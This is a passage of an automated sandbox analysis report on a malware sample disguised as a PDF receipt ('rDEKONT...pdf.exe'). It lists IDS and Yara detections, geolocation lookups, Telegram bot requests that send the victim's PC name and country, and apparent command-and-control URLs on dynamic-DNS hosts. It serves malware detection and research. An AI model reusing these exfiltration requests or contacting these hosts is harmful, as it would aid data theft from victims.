                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h11_2_055F0040
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FF261h11_2_055FEFB8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FB3C8h11_2_055FAFA3
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FEE09h11_2_055FEB60
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055F0D0Dh11_2_055F0B30
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055F1697h11_2_055F0B30
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FD719h11_2_055FD470
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FF6B9h11_2_055FF410
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FB3C8h11_2_055FB2F6
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FDFC9h11_2_055FDD20
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 4x nop then jmp 055FDB71h11_2_055FD8C8

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49775 -> 149.154.167.220:443
                  Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49764 -> 149.154.167.220:443
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2013:16:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2012:17:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
                  Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49737 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49747 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 132.226.247.73:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49745 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49735 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49765 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49769 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49762 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49742 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49761 -> 104.21.64.1:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49753 -> 104.21.64.1:443
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49734 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.4:49743 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2013:16:46%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2016/01/2025%20/%2012:17:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 06:02:14 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 16 Jan 2025 06:02:18 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1724559523.00000000035B4000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1764945738.0000000003249000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000432000.00000040.00000400.00020000.00000000.sdmp, rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4151342112.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, teXfNv.exe, 0000000B.00000002.4151393860.0000000002B41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1730097707.0000000009A92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
